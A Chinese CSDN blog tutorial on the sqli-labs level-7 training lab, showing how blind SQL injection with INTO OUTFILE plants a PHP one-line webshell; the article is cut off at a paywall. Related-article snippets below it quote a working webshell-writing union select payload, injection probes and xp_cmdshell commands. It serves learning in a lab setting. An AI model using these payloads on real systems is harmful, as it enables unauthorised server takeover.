初学Web安全之sql注入(三)——利用outfile写入

最新推荐文章于 2024-08-07 11:15:56 发布
最新推荐文章于 2024-08-07 11:15:56 发布
阅读量911 收藏 5
点赞数 2
分类专栏: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47531846/article/details/109863405
版权
在学习Web安全时,遇到sqli-labs第七关,该关卡提示使用outfile。由于没有回显和报错,不适合联合查询和报错注入,故采用布尔盲注配合outfile上传一句话木马。首先确认数据库有写入权限,修改后开始尝试。通过判断字段数,使用into outfile写入木马到服务器,并成功通过菜刀工具连接,获取权限。此方法能快速突破,但手工盲注则较为耗时。
摘要由CSDN通过智能技术生成

本来打算写关于盲注的,不过在做sqli-labs第七关遇见了outfile写入的,所以在讲盲注之前,先插入一点别的:

sqli-labs第七关:

用我们之前的判断方法,发现既没有回显,也没有报错,只是页面显示结果不同:
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

那么使用联合查询和报错注入都不行,这里就需要使用布尔盲注了,但是页面有“outfile”提醒,那么我们这里就可以尝试使用outfile上传一句话木马。

想要使用outfile,首先得确定数据库有写入权限,我们打开mysql数据库查看:

在这里插入图片描述
也可以打开phpadmin查看:

最低0.47元/天 解锁文章
槑mei
关注
专栏目录
outfile C++写入文件
08-31
在C++中将数据输出到文件需要用到文件流,将数据输出到文件(即下图中的写文件)时会用到ofstream 类.下面就具体介绍如何将一段字符或数据输出到文件中并保存
sql注入下的outfile
Warrior_L6的博客
06-07 777
一、关于写入本地文件类型注入的思考 secure_file_priv="/" secure_file_priv的开关问题 默认情况下: 我们查一下这个secure_file_priv得到下面的结果 可以看到,本地value的值为NULL。NULL代表什么意思呢?经查资料: (1)NULL,表示禁止。 (2)如果value值有文件夹目录,则表示只允许该目录下文件(PS:测试子目录也不行)。 (3)如果为空,则表示不限制目录。 因为在my.ini的配置文件下没有secure_f..
sql注入中load_file、outfile和dumpfile的使用
最新发布
m0_64849639的博客
08-07 333
load_file、outfile和dumpfile的使用
mysql注入 outfile_sql注入之文件写入into outfile
weixin_30698775的博客
02-02 2132
sql注入写入webshell的几种方式sql注入写入webshell的几种方式secure_file_priv="c:/…"被注释掉或者是web路径php.ini中的get_magic_quotes_gpc()函数未开启其中secure_file_priv有种情况空,表示导入导出没有任何限制有指定路径,比如("c:/xxx/xxx"):只能向指定路径导入导出文件null,禁止导入导出在进行...
mysql注入 outfile_Mysql注入中的outfile、dumpfile、load_file函数详解
weixin_39973196的博客
02-02 103
利用sql注入漏洞后期,最常用的就是通过mysqlfile系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下个into dumpfile()into outfile()load_file()测试如下: 读写文件函数调用的限制因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数 secure_file_priv 的影响。官方文档中的描述如下: 翻译一下就是其...
sql语句利用into outfile写入一句话
Blue_Starry的博客
03-04 6800
利用需要的条件有: 1、对web目录需要有写权限能够使用单引号 2、知道绝对路径 3、没有配置-secure-file-priv 当知道路径时,可以直接用?id=1 union select "<?php @eval($_POST['123']);?>" into outfile("C:/phpStudy/WWW/a.php") 或者采用PHPmyadmin,选择一个数据库如...
东塔学院(sql注入篇 字符型注入,报错注入,JSON,文件读取、写入
m0_55563900的博客
03-30 1029
什么是sql注入 SQL注入是服务器端未严格校验客户端发送的数据,而导致服务端SQL语句被恶意修改并成功执行的行为 称为SQL注入。 代码对带入SQL语句的参数过滤不严格 未启用框架的安全配置,例如: PHP的magic. quotes. _gpc 未使用框架安全的查询方法 测试接未删除 未启用防火墙 未使用其他的安全防护设备 字符型注入类型1 打开页面,叫我们输入ID作为带数值的参数 Mysql查询经常用到的语句 查库:select schema_name from information_schem
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3094
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
sqli-labs视频
02-23
"part 10"展示了如何利用SQL注入来导出数据库内容,通常使用`OUTFILE`指令将数据写入服务器上的文件,然后通过其他方式访问这些文件。 通过观看sqli-labs视频系列,学习者能够深入理解SQL注入的原理,掌握检测和...
【大数据 OLAP 技术新书推荐】 字节跳动阿里巴巴大厂资深架构师程序员多年实践经验总结《ClickHouse入门、实战与进阶》ClickHouse领域集大成之作,入门标准参考书日常工作案头必备手册
程序员光剑
06-25 1万+
本书是ClickHouse领域的集大成之作,从基础知识、实现原理、项目实战、扩展应用4个维度全面展开,表述简练清晰、案例丰富实用,既可以作为入门的标准参考书,又适合作为案头速查手册。书中内容是作者在阿里巴巴、字节跳动多年实战经验的总结,得到了字节跳动和阿里巴巴9位大数据专家的高度评价。全书共10章,主要内容如下:第1~3章整体介绍ClickHouse概念、特性、应用场景、技术生态、快速入门和基础数据类型等基础内容,目的是从本质上揭开ClickHouse高性能背后的秘密,帮助读者快速上手实践。
Mysql注入中的outfile、dumpfile、load_file函数详解
09-09
主要介绍了Mysql注入中的outfile、dumpfile、load_file,需要的朋友可以参考下
mysql sql语句outfile_用SELECT... INTO OUTFILE语句导出MySQL数据的教程
weixin_29157493的博客
02-01 1596
表数据导出到一个文本文件最简单的方法是使用SELECT... INTO OUTFILE语句的查询结果直接导出到一个文件在服务器主机上。导出数据的SELECT...INTO OUTFILE声明:这句话的语法结合了常规的SELECT INTO OUTFILE文件名的末尾。默认的输出格式是相同的LOAD DATA,所以下面的语句导出tutorials_tbl的表制表符分隔的,换行结尾的文件到/tmp/t...
Mysql之outfile
热门推荐
henry的博客
11-04 1万+
1、outfile是将检索到的数据,保存到服务器的文件内: 格式:select * into outfile "文件地址" 示例: mysql> select * into outfile 'f:/mysql/test/one' from teacher_class; 2、文件是自动创建的。 生成的文件格式: 默认的,采用行来区分记录,而采用tab制表符,来区分字段。 3、而为了满足
C++“outFile”介绍
Tan_Zhixia的博客
01-14 1062
没什么可说的,只是提醒一句:outFile和cout没有一丁点区别!
SQLSERVER导入导出文本文件
技术交流
06-01 326
SQLSERVER导入导出文本文件     /** 导出文本文件 EXEC master..xp_cmdshell 'bcp "Select * from 库名..表名" queryout c:\DT.txt -c -S192.168.1.121 -Usa -P123456'   /** 导入文本文件 EXEC master..xp_cmdshell 'bcp "库名..表名" in...
sqli-labs-less-7 使用outfile函数写入一句话木马
yzcn
10-30 1748
Less-7 一句话木马 判断注入点: 127.0.0.1/sqli-labs-master/Less-7/?id=1 显示正常 提示:You are in… Use outfile… 127.0.0.1/sqli-labs-master/Less-7/?id=1’ 显示错误,错误信息:You have an error in your SQL syntax 。。。。。。 127.0.0.1/sqli-labs-master/Less-7/?id=1’)) 显示错误 127.0.0.1/sqli-l
mysql注入中的outfile、dumpfile、load_file函数详解
whatday的专栏
10-29 3400
利用sql注入漏洞后期,最常用的就是通过mysqlfile系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下个 into dumpfile() into outfile() load_file() 我们本次的测试数据如下 读写文件函数调用的限制 因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数secure_file_priv的影...
SQL注入攻防:盲注技巧与绕过策略总结
在网络安全,特别是Web安全领域,SQL注入是一种常见的攻击手段,攻击者通过构造恶意输入,使得应用程序执行非预期的SQL命令。本文主要关注SQL注入的技巧,特别是盲注方法,这是一种在无法直接看到数据库响应时,通过...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值